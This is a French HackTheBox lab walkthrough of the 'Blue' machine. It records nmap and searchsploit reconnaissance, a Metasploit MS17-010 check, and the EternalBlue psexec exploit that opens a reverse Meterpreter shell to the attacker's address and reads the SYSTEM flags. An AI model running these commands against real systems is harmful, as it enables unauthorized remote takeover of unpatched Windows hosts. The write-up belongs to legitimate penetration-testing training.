HackTheBox Walkthrough - Blue¶
Machine ciblée : Blue.
Répertoire : /home/kali/Blue
Temps passé dessus : 20 mins
Changelog du template¶
Version 1.0 - Sep. 2022 : création du template de base
Version 1.1 - Oct. 2022 : Rajout des scan nmap et des commandes de base
Version 1.2 - Nov. 2022 : Rajout des redirection pour éviter les retours d’erreur et du domaine pour être compliant avec TryHackMe
Version 1.3 - Nov. 2022 : Ajout du scan UDP + de l’export vers searchsploit
Phase 1 : Reconnaissance¶
Ok, vu le Blue, et qu’elle est en facile, je parie sur du EternalBlue.
┌──(kali㉿kali)-[~]
└─$
name="Blue"
repository="/home/kali/$name"
ip="10.10.10.40"
domain='htb'
cd $repository 2&>/dev/null || mkdir $repository && cd $repository
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
nmap -Pn -A -T5 --top-port 1000 -oN $repository/txt $ip
nmap -Pn -A -T5 -p - -oN $repository/full -oX $repository/sploitable $ip
searchsploit --nmap $repository/sploitable
sudo nmap -Pn -A -T5 -sU -p - -oN $repository/udp -oX $repository/udploitable $ip
searchsploit --nmap $repository/udploitable
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.61 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:35 CET
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for Blue (10.10.10.40)
Host is up (0.017s latency).
Not shown: 65467 closed tcp ports (conn-refused), 59 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-12-04T16:37:11
|_ start_date: 2022-12-04T03:06:10
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-12-04T16:37:12+00:00
|_clock-skew: mean: 5s, deviation: 2s, median: 4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.32 seconds
[i] SearchSploit s XML mode (without verbose enabled). To enable: searchsploit -v --xml...
[i] Reading: '/home/kali/Blue/sploitable'
[i] /usr/bin/searchsploit -t msrpc
[i] /usr/bin/searchsploit -t microsoft windows rpc
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011) | windows/remote/293.c
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026) | windows/remote/100.c
Microsoft Windows - 'RPC DCOM' Remote (1) | windows/remote/69.c
Microsoft Windows - 'RPC DCOM' Remote (2) | windows/remote/70.c
Microsoft Windows - 'RPC DCOM' Remote (Universal) | windows/remote/76.c
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow | windows/remote/64.c
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039) | windows/remote/97.c
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039) | windows/remote/103.c
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption | windows/dos/3453.py
Microsoft Windows - DCOM RPC Interface Buffer Overrun | windows/remote/22917.txt
Microsoft Windows - DNS RPC Remote Buffer Overflow (2) | windows/remote/3746.txt
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation | windows/local/47135.txt
Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow | windows/remote/5.c
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076) | windows/local/37768.txt
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) | windows/remote/4745.cpp
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) | windows/remote/4934.c
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service | windows/dos/61.c
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow | windows/remote/3737.py
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026) | windows/remote/66.c
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory | windows/remote/117.c
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation | windows/local/32892.txt
------------------------------------------------------------------------------------------------ ---------------------------------
[i] /usr/bin/searchsploit -t netbios ssn
[i] /usr/bin/searchsploit -t microsoft windows netbios ssn
[i] /usr/bin/searchsploit -t microsoft ds
Phase 2 : Analyse¶
Ok donc ça semble pas mal : on a du netbios, du rpc … Tout ce qui va bien pour un petit EternalBlue tranquillou. Vérifions.
┌──(kali㉿kali)-[~/Blue]
└─$ msfconsole -qx "use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $ip ; run;exit"
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Ça, ça veut dire que l’on va pouvoir la run sans problème.
Phase 3 : User¶
┌──(kali㉿kali)-[~/Blue]
└─$ localip=`ip a | grep tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
┌──(kali㉿kali)-[~/Blue]
└─$ msfconsole -qx "use exploit/windows/smb/ms17_010_psexec; set RHOSTS $ip; set LHOST $localip;run"
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK fi running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.10.40
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.40:49159) at 2022-12-04 17:47:36 +0100
meterpreter > cd /Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2017-07-21 08:56:36 +0200 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 09:07:31 +0200 Default
040777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 Default User
040555/r-xr-xr-x 4096 dir 2011-04-12 09:51:29 +0200 Public
100666/rw-rw-rw- 174 fil 2009-07-14 06:54:24 +0200 desktop.ini
040777/rwxrwxrwx 8192 dir 2017-07-14 15:45:53 +0200 haris
meterpreter > cat haris/Desktop/user.txt
85b6df7ad435ca29ff83d1e2fe51d2d8
meterpreter > cat Administrator/Desktop/root.txt
d6e84d5744a16119df8bd19e5d8e77ed
Phase 4 : Elevation de privilege¶
Il n’y aura pas de PE ici.
Récapitulatif¶
Juste au nom de la machine, on sait déjà quoi faire, alors c’est simple. Mais il reste intéressant de voir les prérequis pour Eternal Blue.
On se trouve ici sur une « vielle » machine qui dispose de smb et qui ne demande pas la signature des message.
A retenir¶
Eternal blue, c’est trop violent.